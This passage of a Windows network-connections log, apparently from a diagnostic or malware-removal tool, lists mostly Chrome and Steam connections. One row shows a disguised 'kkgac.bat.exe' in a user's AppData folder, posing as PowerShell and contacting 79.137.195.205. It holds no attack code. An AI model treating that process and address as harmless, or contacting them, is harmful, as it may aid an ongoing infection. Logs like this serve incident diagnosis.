53471	TIME_WAIT	104.26.3.70	443	[0]	x64
53473	TIME_WAIT	99.84.171.224	443	[0]	x64
53474	TIME_WAIT	99.84.171.224	443	[0]	x64
53476	TIME_WAIT	108.156.120.44	443	[0]	x64
53477	TIME_WAIT	35.190.80.1	443	[0]	x64
53478	TIME_WAIT	142.250.190.98	443	[0]	x64
53479	TIME_WAIT	172.217.0.161	443	[0]	x64
53480	TIME_WAIT	142.250.123.156	443	[0]	x64
53483	TIME_WAIT	142.250.191.225	443	[0]	x64
53484	TIME_WAIT	142.250.191.162	443	[0]	x64
53486	TIME_WAIT	34.195.78.113	443	[0]	x64
53487	TIME_WAIT	172.217.2.34	443	[0]	x64
53489	TIME_WAIT	142.250.190.132	443	[0]	x64
53493	TIME_WAIT	64.74.236.223	443	[0]	x64
53495	TIME_WAIT	142.250.190.98	443	[0]	x64
53497	TIME_WAIT	3.231.49.235	443	[0]	x64
53498	TIME_WAIT	104.18.24.185	443	[0]	x64
53499	TIME_WAIT	104.18.24.185	443	[0]	x64
53500	TIME_WAIT	68.67.160.186	443	[0]	x64
53501	TIME_WAIT	104.36.115.111	443	[0]	x64
53503	TIME_WAIT	54.84.99.145	443	[0]	x64
53504	TIME_WAIT	34.237.206.66	443	[0]	x64
53505	TIME_WAIT	172.217.2.38	443	[0]	x64
53506	TIME_WAIT	142.250.190.38	443	[0]	x64
53507	TIME_WAIT	50.31.142.223	443	[0]	x64
53511	TIME_WAIT	50.31.142.223	443	[0]	x64
53512	TIME_WAIT	34.96.70.87	443	[0]	x64
53515	TIME_WAIT	108.157.142.99	443	[0]	x64
53516	TIME_WAIT	54.162.38.247	443	[0]	x64
53517	TIME_WAIT	108.157.134.49	443	[0]	x64
53518	SYN_SENT	69.173.151.98	443	c:\program files (x86)\google\chrome\application\chrome.exe [24832] 3157.77 kb, rsAh, created: 22.04.2020 08:19:56, modified: 20.07.2023 08:58:14 Script: Quarantine, Delete, Delete via BC, Terminate	x64		Google Chrome	Copyright 2023 Google LLC. All rights reserved.
53521	TIME_WAIT	35.190.60.146	443	[0]	x64
53522	TIME_WAIT	52.223.40.198	443	[0]	x64
53523	TIME_WAIT	35.211.178.172	443	[0]	x64
53524	TIME_WAIT	35.207.24.140	443	[0]	x64
53525	TIME_WAIT	34.236.174.186	443	[0]	x64
53526	TIME_WAIT	70.42.32.127	443	[0]	x64
53528	TIME_WAIT	68.67.160.24	443	[0]	x64
53529	TIME_WAIT	108.157.142.48	443	[0]	x64
53531	TIME_WAIT	107.23.55.247	443	[0]	x64
53534	TIME_WAIT	35.190.39.111	443	[0]	x64
53535	TIME_WAIT	172.217.0.161	443	[0]	x64
53538	TIME_WAIT	50.31.142.95	443	[0]	x64
53539	TIME_WAIT	50.31.142.95	443	[0]	x64
53540	TIME_WAIT	50.31.142.95	443	[0]	x64
53541	TIME_WAIT	142.250.191.130	443	[0]	x64
53542	TIME_WAIT	50.31.142.95	443	[0]	x64
53543	TIME_WAIT	185.167.164.49	443	[0]	x64
53544	TIME_WAIT	85.114.159.118	443	[0]	x64
53547	TIME_WAIT	35.175.166.208	443	[0]	x64
53548	TIME_WAIT	52.0.156.250	443	[0]	x64
53550	TIME_WAIT	69.173.151.100	443	[0]	x64
53552	TIME_WAIT	162.248.18.32	443	[0]	x64
53553	TIME_WAIT	34.98.64.218	443	[0]	x64
53554	TIME_WAIT	54.147.94.189	443	[0]	x64
53555	TIME_WAIT	3.225.218.10	443	[0]	x64
53557	TIME_WAIT	104.36.113.111	443	[0]	x64
53558	TIME_WAIT	204.79.197.200	443	[0]	x64
53560	TIME_WAIT	108.157.142.94	443	[0]	x64
53561	TIME_WAIT	207.198.113.86	443	[0]	x64
53562	TIME_WAIT	198.148.27.131	443	[0]	x64
53564	TIME_WAIT	172.67.191.172	443	[0]	x64
53565	TIME_WAIT	192.184.69.167	443	[0]	x64
53572	TIME_WAIT	142.250.190.33	443	[0]	x64
53575	TIME_WAIT	142.250.191.162	443	[0]	x64
53577	TIME_WAIT	142.250.191.225	443	[0]	x64
53579	TIME_WAIT	142.250.190.68	443	[0]	x64
53582	TIME_WAIT	142.250.191.225	443	[0]	x64
53585	TIME_WAIT	142.250.191.162	443	[0]	x64
53586	TIME_WAIT	52.116.53.150	443	[0]	x64
53587	TIME_WAIT	142.250.191.162	443	[0]	x64
53592	TIME_WAIT	142.250.190.98	443	[0]	x64
53595	TIME_WAIT	34.117.26.124	443	[0]	x64
53598	TIME_WAIT	159.127.43.10	443	[0]	x64
53599	TIME_WAIT	142.250.190.98	443	[0]	x64
53601	TIME_WAIT	35.201.101.243	443	[0]	x64
53608	TIME_WAIT	142.250.190.5	443	[0]	x64
53614	TIME_WAIT	199.127.204.171	443	[0]	x64
53616	TIME_WAIT	3.135.132.32	443	[0]	x64
53617	TIME_WAIT	44.207.72.204	443	[0]	x64
53619	TIME_WAIT	35.201.101.243	443	[0]	x64
53620	TIME_WAIT	35.201.101.243	443	[0]	x64
53621	TIME_WAIT	199.127.204.142	443	[0]	x64
53626	TIME_WAIT	159.127.43.10	443	[0]	x64
53627	TIME_WAIT	159.127.43.10	443	[0]	x64
53628	TIME_WAIT	108.157.142.52	443	[0]	x64
53629	TIME_WAIT	159.127.43.10	443	[0]	x64
53631	SYN_SENT	79.137.195.205	80	c:\users\isaac\appdata\roaming\kkgac.bat.exe [16056] 411.00 kb, rSaH, created: 23.07.2023 02:12:17, modified: 07.05.2022 00:20:22 Script: Quarantine, Delete, Delete via BC, Terminate	x64		Windows PowerShell	© Microsoft Corporation. All rights reserved.
53632	TIME_WAIT	159.127.43.10	443	[0]	x64
53634	TIME_WAIT	159.127.43.10	443	[0]	x64
53635	TIME_WAIT	104.16.242.229	443	[0]	x64
53638	ESTABLISHED	151.101.1.108	443	c:\program files (x86)\google\chrome\application\chrome.exe [24832] 3157.77 kb, rsAh, created: 22.04.2020 08:19:56, modified: 20.07.2023 08:58:14 Script: Quarantine, Delete, Delete via BC, Terminate	x64		Google Chrome	Copyright 2023 Google LLC. All rights reserved.
53643	ESTABLISHED	104.90.23.83	443	c:\program files (x86)\google\chrome\application\chrome.exe [24832] 3157.77 kb, rsAh, created: 22.04.2020 08:19:56, modified: 20.07.2023 08:58:14 Script: Quarantine, Delete, Delete via BC, Terminate	x64		Google Chrome	Copyright 2023 Google LLC. All rights reserved.
53644	ESTABLISHED	108.157.148.226	443	c:\program files (x86)\google\chrome\application\chrome.exe [24832] 3157.77 kb, rsAh, created: 22.04.2020 08:19:56, modified: 20.07.2023 08:58:14 Script: Quarantine, Delete, Delete via BC, Terminate	x64		Google Chrome	Copyright 2023 Google LLC. All rights reserved.
53645	ESTABLISHED	108.157.142.84	443	c:\program files (x86)\google\chrome\application\chrome.exe [24832] 3157.77 kb, rsAh, created: 22.04.2020 08:19:56, modified: 20.07.2023 08:58:14 Script: Quarantine, Delete, Delete via BC, Terminate	x64		Google Chrome	Copyright 2023 Google LLC. All rights reserved.
53646	ESTABLISHED	108.157.142.84	443	c:\program files (x86)\google\chrome\application\chrome.exe [24832] 3157.77 kb, rsAh, created: 22.04.2020 08:19:56, modified: 20.07.2023 08:58:14 Script: Quarantine, Delete, Delete via BC, Terminate	x64		Google Chrome	Copyright 2023 Google LLC. All rights reserved.
53647	ESTABLISHED	35.71.139.29	443	c:\program files (x86)\google\chrome\application\chrome.exe [24832] 3157.77 kb, rsAh, created: 22.04.2020 08:19:56, modified: 20.07.2023 08:58:14 Script: Quarantine, Delete, Delete via BC, Terminate	x64		Google Chrome	Copyright 2023 Google LLC. All rights reserved.
53648	ESTABLISHED	23.32.129.152	443	c:\program files (x86)\google\chrome\application\chrome.exe [24832] 3157.77 kb, rsAh, created: 22.04.2020 08:19:56, modified: 20.07.2023 08:58:14 Script: Quarantine, Delete, Delete via BC, Terminate	x64		Google Chrome	Copyright 2023 Google LLC. All rights reserved.
53649	ESTABLISHED	23.32.128.201	443	c:\program files (x86)\google\chrome\application\chrome.exe [24832] 3157.77 kb, rsAh, created: 22.04.2020 08:19:56, modified: 20.07.2023 08:58:14 Script: Quarantine, Delete, Delete via BC, Terminate	x64		Google Chrome	Copyright 2023 Google LLC. All rights reserved.
53650	ESTABLISHED	23.55.126.89	443	c:\program files (x86)\google\chrome\application\chrome.exe [24832] 3157.77 kb, rsAh, created: 22.04.2020 08:19:56, modified: 20.07.2023 08:58:14 Script: Quarantine, Delete, Delete via BC, Terminate	x64		Google Chrome	Copyright 2023 Google LLC. All rights reserved.
53651	ESTABLISHED	23.212.73.148	443	c:\program files (x86)\google\chrome\application\chrome.exe [24832] 3157.77 kb, rsAh, created: 22.04.2020 08:19:56, modified: 20.07.2023 08:58:14 Script: Quarantine, Delete, Delete via BC, Terminate	x64		Google Chrome	Copyright 2023 Google LLC. All rights reserved.
53652	ESTABLISHED	104.18.11.47	443	c:\program files (x86)\google\chrome\application\chrome.exe [24832] 3157.77 kb, rsAh, created: 22.04.2020 08:19:56, modified: 20.07.2023 08:58:14 Script: Quarantine, Delete, Delete via BC, Terminate	x64		Google Chrome	Copyright 2023 Google LLC. All rights reserved.
53653	ESTABLISHED	142.250.190.38	443	c:\program files (x86)\google\chrome\application\chrome.exe [24832] 3157.77 kb, rsAh, created: 22.04.2020 08:19:56, modified: 20.07.2023 08:58:14 Script: Quarantine, Delete, Delete via BC, Terminate	x64		Google Chrome	Copyright 2023 Google LLC. All rights reserved.
53655	ESTABLISHED	68.67.160.24	443	c:\program files (x86)\google\chrome\application\chrome.exe [24832] 3157.77 kb, rsAh, created: 22.04.2020 08:19:56, modified: 20.07.2023 08:58:14 Script: Quarantine, Delete, Delete via BC, Terminate	x64		Google Chrome	Copyright 2023 Google LLC. All rights reserved.
53656	ESTABLISHED	52.223.40.198	443	c:\program files (x86)\google\chrome\application\chrome.exe [24832] 3157.77 kb, rsAh, created: 22.04.2020 08:19:56, modified: 20.07.2023 08:58:14 Script: Quarantine, Delete, Delete via BC, Terminate	x64		Google Chrome	Copyright 2023 Google LLC. All rights reserved.
53657	ESTABLISHED	35.211.178.172	443	c:\program files (x86)\google\chrome\application\chrome.exe [24832] 3157.77 kb, rsAh, created: 22.04.2020 08:19:56, modified: 20.07.2023 08:58:14 Script: Quarantine, Delete, Delete via BC, Terminate	x64		Google Chrome	Copyright 2023 Google LLC. All rights reserved.
53658	ESTABLISHED	204.79.197.200	443	c:\program files (x86)\google\chrome\application\chrome.exe [24832] 3157.77 kb, rsAh, created: 22.04.2020 08:19:56, modified: 20.07.2023 08:58:14 Script: Quarantine, Delete, Delete via BC, Terminate	x64		Google Chrome	Copyright 2023 Google LLC. All rights reserved.
53659	ESTABLISHED	70.42.32.127	443	c:\program files (x86)\google\chrome\application\chrome.exe [24832] 3157.77 kb, rsAh, created: 22.04.2020 08:19:56, modified: 20.07.2023 08:58:14 Script: Quarantine, Delete, Delete via BC, Terminate	x64		Google Chrome	Copyright 2023 Google LLC. All rights reserved.
53660	ESTABLISHED	3.214.207.4	443	c:\program files (x86)\google\chrome\application\chrome.exe [24832] 3157.77 kb, rsAh, created: 22.04.2020 08:19:56, modified: 20.07.2023 08:58:14 Script: Quarantine, Delete, Delete via BC, Terminate	x64		Google Chrome	Copyright 2023 Google LLC. All rights reserved.
53661	ESTABLISHED	13.107.42.14	443	c:\program files (x86)\google\chrome\application\chrome.exe [24832] 3157.77 kb, rsAh, created: 22.04.2020 08:19:56, modified: 20.07.2023 08:58:14 Script: Quarantine, Delete, Delete via BC, Terminate	x64		Google Chrome	Copyright 2023 Google LLC. All rights reserved.
53662	ESTABLISHED	74.119.119.149	443	c:\program files (x86)\google\chrome\application\chrome.exe [24832] 3157.77 kb, rsAh, created: 22.04.2020 08:19:56, modified: 20.07.2023 08:58:14 Script: Quarantine, Delete, Delete via BC, Terminate	x64		Google Chrome	Copyright 2023 Google LLC. All rights reserved.
53663	ESTABLISHED	108.157.142.16	443	c:\program files (x86)\google\chrome\application\chrome.exe [24832] 3157.77 kb, rsAh, created: 22.04.2020 08:19:56, modified: 20.07.2023 08:58:14 Script: Quarantine, Delete, Delete via BC, Terminate	x64		Google Chrome	Copyright 2023 Google LLC. All rights reserved.
53664	ESTABLISHED	104.22.55.232	443	c:\program files (x86)\google\chrome\application\chrome.exe [24832] 3157.77 kb, rsAh, created: 22.04.2020 08:19:56, modified: 20.07.2023 08:58:14 Script: Quarantine, Delete, Delete via BC, Terminate	x64		Google Chrome	Copyright 2023 Google LLC. All rights reserved.
53665	ESTABLISHED	99.84.171.224	443	c:\program files (x86)\google\chrome\application\chrome.exe [24832] 3157.77 kb, rsAh, created: 22.04.2020 08:19:56, modified: 20.07.2023 08:58:14 Script: Quarantine, Delete, Delete via BC, Terminate	x64		Google Chrome	Copyright 2023 Google LLC. All rights reserved.
53666	ESTABLISHED	99.84.171.224	443	c:\program files (x86)\google\chrome\application\chrome.exe [24832] 3157.77 kb, rsAh, created: 22.04.2020 08:19:56, modified: 20.07.2023 08:58:14 Script: Quarantine, Delete, Delete via BC, Terminate	x64		Google Chrome	Copyright 2023 Google LLC. All rights reserved.
53668	ESTABLISHED	108.157.142.63	443	c:\program files (x86)\google\chrome\application\chrome.exe [24832] 3157.77 kb, rsAh, created: 22.04.2020 08:19:56, modified: 20.07.2023 08:58:14 Script: Quarantine, Delete, Delete via BC, Terminate	x64		Google Chrome	Copyright 2023 Google LLC. All rights reserved.
53669	ESTABLISHED	104.26.3.70	443	c:\program files (x86)\google\chrome\application\chrome.exe [24832] 3157.77 kb, rsAh, created: 22.04.2020 08:19:56, modified: 20.07.2023 08:58:14 Script: Quarantine, Delete, Delete via BC, Terminate	x64		Google Chrome	Copyright 2023 Google LLC. All rights reserved.
53670	ESTABLISHED	23.32.129.152	443	c:\program files (x86)\google\chrome\application\chrome.exe [24832] 3157.77 kb, rsAh, created: 22.04.2020 08:19:56, modified: 20.07.2023 08:58:14 Script: Quarantine, Delete, Delete via BC, Terminate	x64		Google Chrome	Copyright 2023 Google LLC. All rights reserved.
53671	ESTABLISHED	3.227.190.204	443	c:\program files (x86)\google\chrome\application\chrome.exe [24832] 3157.77 kb, rsAh, created: 22.04.2020 08:19:56, modified: 20.07.2023 08:58:14 Script: Quarantine, Delete, Delete via BC, Terminate	x64		Google Chrome	Copyright 2023 Google LLC. All rights reserved.
53672	ESTABLISHED	108.157.150.17	443	c:\program files (x86)\google\chrome\application\chrome.exe [24832] 3157.77 kb, rsAh, created: 22.04.2020 08:19:56, modified: 20.07.2023 08:58:14 Script: Quarantine, Delete, Delete via BC, Terminate	x64		Google Chrome	Copyright 2023 Google LLC. All rights reserved.
53673	ESTABLISHED	146.75.78.132	443	c:\program files (x86)\google\chrome\application\chrome.exe [24832] 3157.77 kb, rsAh, created: 22.04.2020 08:19:56, modified: 20.07.2023 08:58:14 Script: Quarantine, Delete, Delete via BC, Terminate	x64		Google Chrome	Copyright 2023 Google LLC. All rights reserved.
53675	ESTABLISHED	108.157.142.99	443	c:\program files (x86)\google\chrome\application\chrome.exe [24832] 3157.77 kb, rsAh, created: 22.04.2020 08:19:56, modified: 20.07.2023 08:58:14 Script: Quarantine, Delete, Delete via BC, Terminate	x64		Google Chrome	Copyright 2023 Google LLC. All rights reserved.
53676	ESTABLISHED	108.157.142.16	443	c:\program files (x86)\google\chrome\application\chrome.exe [24832] 3157.77 kb, rsAh, created: 22.04.2020 08:19:56, modified: 20.07.2023 08:58:14 Script: Quarantine, Delete, Delete via BC, Terminate	x64		Google Chrome	Copyright 2023 Google LLC. All rights reserved.
53677	ESTABLISHED	64.74.236.223	443	c:\program files (x86)\google\chrome\application\chrome.exe [24832] 3157.77 kb, rsAh, created: 22.04.2020 08:19:56, modified: 20.07.2023 08:58:14 Script: Quarantine, Delete, Delete via BC, Terminate	x64		Google Chrome	Copyright 2023 Google LLC. All rights reserved.
53678	ESTABLISHED	50.31.142.223	443	c:\program files (x86)\google\chrome\application\chrome.exe [24832] 3157.77 kb, rsAh, created: 22.04.2020 08:19:56, modified: 20.07.2023 08:58:14 Script: Quarantine, Delete, Delete via BC, Terminate	x64		Google Chrome	Copyright 2023 Google LLC. All rights reserved.
53679	ESTABLISHED	141.148.8.2	443	c:\program files (x86)\google\chrome\application\chrome.exe [24832] 3157.77 kb, rsAh, created: 22.04.2020 08:19:56, modified: 20.07.2023 08:58:14 Script: Quarantine, Delete, Delete via BC, Terminate	x64		Google Chrome	Copyright 2023 Google LLC. All rights reserved.
53680	ESTABLISHED	108.157.150.90	443	c:\program files (x86)\google\chrome\application\chrome.exe [24832] 3157.77 kb, rsAh, created: 22.04.2020 08:19:56, modified: 20.07.2023 08:58:14 Script: Quarantine, Delete, Delete via BC, Terminate	x64		Google Chrome	Copyright 2023 Google LLC. All rights reserved.
53681	ESTABLISHED	108.157.142.29	443	c:\program files (x86)\google\chrome\application\chrome.exe [24832] 3157.77 kb, rsAh, created: 22.04.2020 08:19:56, modified: 20.07.2023 08:58:14 Script: Quarantine, Delete, Delete via BC, Terminate	x64		Google Chrome	Copyright 2023 Google LLC. All rights reserved.
53682	ESTABLISHED	64.74.236.223	443	c:\program files (x86)\google\chrome\application\chrome.exe [24832] 3157.77 kb, rsAh, created: 22.04.2020 08:19:56, modified: 20.07.2023 08:58:14 Script: Quarantine, Delete, Delete via BC, Terminate	x64		Google Chrome	Copyright 2023 Google LLC. All rights reserved.
53683	ESTABLISHED	64.74.236.223	443	c:\program files (x86)\google\chrome\application\chrome.exe [24832] 3157.77 kb, rsAh, created: 22.04.2020 08:19:56, modified: 20.07.2023 08:58:14 Script: Quarantine, Delete, Delete via BC, Terminate	x64		Google Chrome	Copyright 2023 Google LLC. All rights reserved.
53684	ESTABLISHED	50.31.142.223	443	c:\program files (x86)\google\chrome\application\chrome.exe [24832] 3157.77 kb, rsAh, created: 22.04.2020 08:19:56, modified: 20.07.2023 08:58:14 Script: Quarantine, Delete, Delete via BC, Terminate	x64		Google Chrome	Copyright 2023 Google LLC. All rights reserved.
53685	ESTABLISHED	64.74.236.223	443	c:\program files (x86)\google\chrome\application\chrome.exe [24832] 3157.77 kb, rsAh, created: 22.04.2020 08:19:56, modified: 20.07.2023 08:58:14 Script: Quarantine, Delete, Delete via BC, Terminate	x64		Google Chrome	Copyright 2023 Google LLC. All rights reserved.
53686	ESTABLISHED	107.23.55.247	443	c:\program files (x86)\google\chrome\application\chrome.exe [24832] 3157.77 kb, rsAh, created: 22.04.2020 08:19:56, modified: 20.07.2023 08:58:14 Script: Quarantine, Delete, Delete via BC, Terminate	x64		Google Chrome	Copyright 2023 Google LLC. All rights reserved.
53687	ESTABLISHED	35.190.60.146	443	c:\program files (x86)\google\chrome\application\chrome.exe [24832] 3157.77 kb, rsAh, created: 22.04.2020 08:19:56, modified: 20.07.2023 08:58:14 Script: Quarantine, Delete, Delete via BC, Terminate	x64		Google Chrome	Copyright 2023 Google LLC. All rights reserved.
53688	ESTABLISHED	52.55.144.0	443	c:\program files (x86)\google\chrome\application\chrome.exe [24832] 3157.77 kb, rsAh, created: 22.04.2020 08:19:56, modified: 20.07.2023 08:58:14 Script: Quarantine, Delete, Delete via BC, Terminate	x64		Google Chrome	Copyright 2023 Google LLC. All rights reserved.
53689	ESTABLISHED	108.157.150.111	443	c:\program files (x86)\google\chrome\application\chrome.exe [24832] 3157.77 kb, rsAh, created: 22.04.2020 08:19:56, modified: 20.07.2023 08:58:14 Script: Quarantine, Delete, Delete via BC, Terminate	x64		Google Chrome	Copyright 2023 Google LLC. All rights reserved.
53690	ESTABLISHED	52.46.143.56	443	c:\program files (x86)\google\chrome\application\chrome.exe [24832] 3157.77 kb, rsAh, created: 22.04.2020 08:19:56, modified: 20.07.2023 08:58:14 Script: Quarantine, Delete, Delete via BC, Terminate	x64		Google Chrome	Copyright 2023 Google LLC. All rights reserved.
53691	ESTABLISHED	54.159.116.102	443	c:\program files (x86)\google\chrome\application\chrome.exe [24832] 3157.77 kb, rsAh, created: 22.04.2020 08:19:56, modified: 20.07.2023 08:58:14 Script: Quarantine, Delete, Delete via BC, Terminate	x64		Google Chrome	Copyright 2023 Google LLC. All rights reserved.
53693	ESTABLISHED	3.231.49.235	443	c:\program files (x86)\google\chrome\application\chrome.exe [24832] 3157.77 kb, rsAh, created: 22.04.2020 08:19:56, modified: 20.07.2023 08:58:14 Script: Quarantine, Delete, Delete via BC, Terminate	x64		Google Chrome	Copyright 2023 Google LLC. All rights reserved.
53694	ESTABLISHED	108.157.142.90	443	c:\program files (x86)\google\chrome\application\chrome.exe [24832] 3157.77 kb, rsAh, created: 22.04.2020 08:19:56, modified: 20.07.2023 08:58:14 Script: Quarantine, Delete, Delete via BC, Terminate	x64		Google Chrome	Copyright 2023 Google LLC. All rights reserved.
53695	ESTABLISHED	69.173.151.98	443	c:\program files (x86)\google\chrome\application\chrome.exe [24832] 3157.77 kb, rsAh, created: 22.04.2020 08:19:56, modified: 20.07.2023 08:58:14 Script: Quarantine, Delete, Delete via BC, Terminate	x64		Google Chrome	Copyright 2023 Google LLC. All rights reserved.
53696	ESTABLISHED	104.36.115.111	443	c:\program files (x86)\google\chrome\application\chrome.exe [24832] 3157.77 kb, rsAh, created: 22.04.2020 08:19:56, modified: 20.07.2023 08:58:14 Script: Quarantine, Delete, Delete via BC, Terminate	x64		Google Chrome	Copyright 2023 Google LLC. All rights reserved.
53697	ESTABLISHED	34.237.206.66	443	c:\program files (x86)\google\chrome\application\chrome.exe [24832] 3157.77 kb, rsAh, created: 22.04.2020 08:19:56, modified: 20.07.2023 08:58:14 Script: Quarantine, Delete, Delete via BC, Terminate	x64		Google Chrome	Copyright 2023 Google LLC. All rights reserved.
53698	ESTABLISHED	54.84.99.145	443	c:\program files (x86)\google\chrome\application\chrome.exe [24832] 3157.77 kb, rsAh, created: 22.04.2020 08:19:56, modified: 20.07.2023 08:58:14 Script: Quarantine, Delete, Delete via BC, Terminate	x64		Google Chrome	Copyright 2023 Google LLC. All rights reserved.
53699	ESTABLISHED	68.67.160.186	443	c:\program files (x86)\google\chrome\application\chrome.exe [24832] 3157.77 kb, rsAh, created: 22.04.2020 08:19:56, modified: 20.07.2023 08:58:14 Script: Quarantine, Delete, Delete via BC, Terminate	x64		Google Chrome	Copyright 2023 Google LLC. All rights reserved.
53700	ESTABLISHED	172.217.4.74	443	c:\program files (x86)\google\chrome\application\chrome.exe [24832] 3157.77 kb, rsAh, created: 22.04.2020 08:19:56, modified: 20.07.2023 08:58:14 Script: Quarantine, Delete, Delete via BC, Terminate	x64		Google Chrome	Copyright 2023 Google LLC. All rights reserved.
53701	ESTABLISHED	108.157.142.49	443	c:\program files (x86)\google\chrome\application\chrome.exe [24832] 3157.77 kb, rsAh, created: 22.04.2020 08:19:56, modified: 20.07.2023 08:58:14 Script: Quarantine, Delete, Delete via BC, Terminate	x64		Google Chrome	Copyright 2023 Google LLC. All rights reserved.
53702	ESTABLISHED	172.217.4.74	443	c:\program files (x86)\google\chrome\application\chrome.exe [24832] 3157.77 kb, rsAh, created: 22.04.2020 08:19:56, modified: 20.07.2023 08:58:14 Script: Quarantine, Delete, Delete via BC, Terminate	x64		Google Chrome	Copyright 2023 Google LLC. All rights reserved.
53703	ESTABLISHED	172.217.0.161	443	c:\program files (x86)\google\chrome\application\chrome.exe [24832] 3157.77 kb, rsAh, created: 22.04.2020 08:19:56, modified: 20.07.2023 08:58:14 Script: Quarantine, Delete, Delete via BC, Terminate	x64		Google Chrome	Copyright 2023 Google LLC. All rights reserved.
53704	ESTABLISHED	108.157.150.90	443	c:\program files (x86)\google\chrome\application\chrome.exe [24832] 3157.77 kb, rsAh, created: 22.04.2020 08:19:56, modified: 20.07.2023 08:58:14 Script: Quarantine, Delete, Delete via BC, Terminate	x64		Google Chrome	Copyright 2023 Google LLC. All rights reserved.
53705	ESTABLISHED	172.217.0.170	443	c:\program files (x86)\google\chrome\application\chrome.exe [24832] 3157.77 kb, rsAh, created: 22.04.2020 08:19:56, modified: 20.07.2023 08:58:14 Script: Quarantine, Delete, Delete via BC, Terminate	x64		Google Chrome	Copyright 2023 Google LLC. All rights reserved.
53707	ESTABLISHED	172.217.2.38	443	c:\program files (x86)\google\chrome\application\chrome.exe [24832] 3157.77 kb, rsAh, created: 22.04.2020 08:19:56, modified: 20.07.2023 08:58:14 Script: Quarantine, Delete, Delete via BC, Terminate	x64		Google Chrome	Copyright 2023 Google LLC. All rights reserved.
53708	ESTABLISHED	142.250.191.138	443	c:\program files (x86)\google\chrome\application\chrome.exe [24832] 3157.77 kb, rsAh, created: 22.04.2020 08:19:56, modified: 20.07.2023 08:58:14 Script: Quarantine, Delete, Delete via BC, Terminate	x64		Google Chrome	Copyright 2023 Google LLC. All rights reserved.
53710	ESTABLISHED	52.116.53.150	443	c:\program files (x86)\google\chrome\application\chrome.exe [24832] 3157.77 kb, rsAh, created: 22.04.2020 08:19:56, modified: 20.07.2023 08:58:14 Script: Quarantine, Delete, Delete via BC, Terminate	x64		Google Chrome	Copyright 2023 Google LLC. All rights reserved.
53713	ESTABLISHED	198.54.12.145	443	c:\program files (x86)\google\chrome\application\chrome.exe [24832] 3157.77 kb, rsAh, created: 22.04.2020 08:19:56, modified: 20.07.2023 08:58:14 Script: Quarantine, Delete, Delete via BC, Terminate	x64		Google Chrome	Copyright 2023 Google LLC. All rights reserved.
53714	ESTABLISHED	198.54.12.145	443	c:\program files (x86)\google\chrome\application\chrome.exe [24832] 3157.77 kb, rsAh, created: 22.04.2020 08:19:56, modified: 20.07.2023 08:58:14 Script: Quarantine, Delete, Delete via BC, Terminate	x64		Google Chrome	Copyright 2023 Google LLC. All rights reserved.
53715	ESTABLISHED	34.233.167.114	443	c:\program files (x86)\google\chrome\application\chrome.exe [24832] 3157.77 kb, rsAh, created: 22.04.2020 08:19:56, modified: 20.07.2023 08:58:14 Script: Quarantine, Delete, Delete via BC, Terminate	x64		Google Chrome	Copyright 2023 Google LLC. All rights reserved.
53716	ESTABLISHED	142.250.190.2	443	c:\program files (x86)\google\chrome\application\chrome.exe [24832] 3157.77 kb, rsAh, created: 22.04.2020 08:19:56, modified: 20.07.2023 08:58:14 Script: Quarantine, Delete, Delete via BC, Terminate	x64		Google Chrome	Copyright 2023 Google LLC. All rights reserved.
53717	ESTABLISHED	172.217.4.195	443	c:\program files (x86)\google\chrome\application\chrome.exe [24832] 3157.77 kb, rsAh, created: 22.04.2020 08:19:56, modified: 20.07.2023 08:58:14 Script: Quarantine, Delete, Delete via BC, Terminate	x64		Google Chrome	Copyright 2023 Google LLC. All rights reserved.
53720	ESTABLISHED	172.217.4.195	443	c:\program files (x86)\google\chrome\application\chrome.exe [24832] 3157.77 kb, rsAh, created: 22.04.2020 08:19:56, modified: 20.07.2023 08:58:14 Script: Quarantine, Delete, Delete via BC, Terminate	x64		Google Chrome	Copyright 2023 Google LLC. All rights reserved.
53721	ESTABLISHED	34.236.174.186	443	c:\program files (x86)\google\chrome\application\chrome.exe [24832] 3157.77 kb, rsAh, created: 22.04.2020 08:19:56, modified: 20.07.2023 08:58:14 Script: Quarantine, Delete, Delete via BC, Terminate	x64		Google Chrome	Copyright 2023 Google LLC. All rights reserved.
53722	ESTABLISHED	142.250.190.98	443	c:\program files (x86)\google\chrome\application\chrome.exe [24832] 3157.77 kb, rsAh, created: 22.04.2020 08:19:56, modified: 20.07.2023 08:58:14 Script: Quarantine, Delete, Delete via BC, Terminate	x64		Google Chrome	Copyright 2023 Google LLC. All rights reserved.
53723	ESTABLISHED	23.32.129.152	443	c:\program files (x86)\google\chrome\application\chrome.exe [24832] 3157.77 kb, rsAh, created: 22.04.2020 08:19:56, modified: 20.07.2023 08:58:14 Script: Quarantine, Delete, Delete via BC, Terminate	x64		Google Chrome	Copyright 2023 Google LLC. All rights reserved.
53724	ESTABLISHED	142.250.191.162	443	c:\program files (x86)\google\chrome\application\chrome.exe [24832] 3157.77 kb, rsAh, created: 22.04.2020 08:19:56, modified: 20.07.2023 08:58:14 Script: Quarantine, Delete, Delete via BC, Terminate	x64		Google Chrome	Copyright 2023 Google LLC. All rights reserved.
53725	ESTABLISHED	216.239.32.3	443	c:\program files (x86)\google\chrome\application\chrome.exe [24832] 3157.77 kb, rsAh, created: 22.04.2020 08:19:56, modified: 20.07.2023 08:58:14 Script: Quarantine, Delete, Delete via BC, Terminate	x64		Google Chrome	Copyright 2023 Google LLC. All rights reserved.
UDP ports
5353	LISTENING	--	--	c:\program files (x86)\google\chrome\application\chrome.exe [23516] 3157.77 kb, rsAh, created: 22.04.2020 08:19:56, modified: 20.07.2023 08:58:14 Script: Quarantine, Delete, Delete via BC, Terminate	x64		Google Chrome	Copyright 2023 Google LLC. All rights reserved.
5353	LISTENING	--	--	c:\program files (x86)\google\chrome\application\chrome.exe [23516] 3157.77 kb, rsAh, created: 22.04.2020 08:19:56, modified: 20.07.2023 08:58:14 Script: Quarantine, Delete, Delete via BC, Terminate	x64		Google Chrome	Copyright 2023 Google LLC. All rights reserved.
27036	LISTENING	--	--	c:\program files (x86)\steam\steam.exe [13792] 4271.85 kb, rsAh, created: 21.05.2018 19:30:20, modified: 21.07.2023 14:04:18 Script: Quarantine, Delete, Delete via BC, Terminate	x64		Steam	Copyright (C) 2021 Valve Corporation
49339	LISTENING	--	--	c:\program files (x86)\google\chrome\application\chrome.exe [24832] 3157.77 kb, rsAh, created: 22.04.2020 08:19:56, modified: 20.07.2023 08:58:14 Script: Quarantine, Delete, Delete via BC, Terminate	x64		Google Chrome	Copyright 2023 Google LLC. All rights reserved.
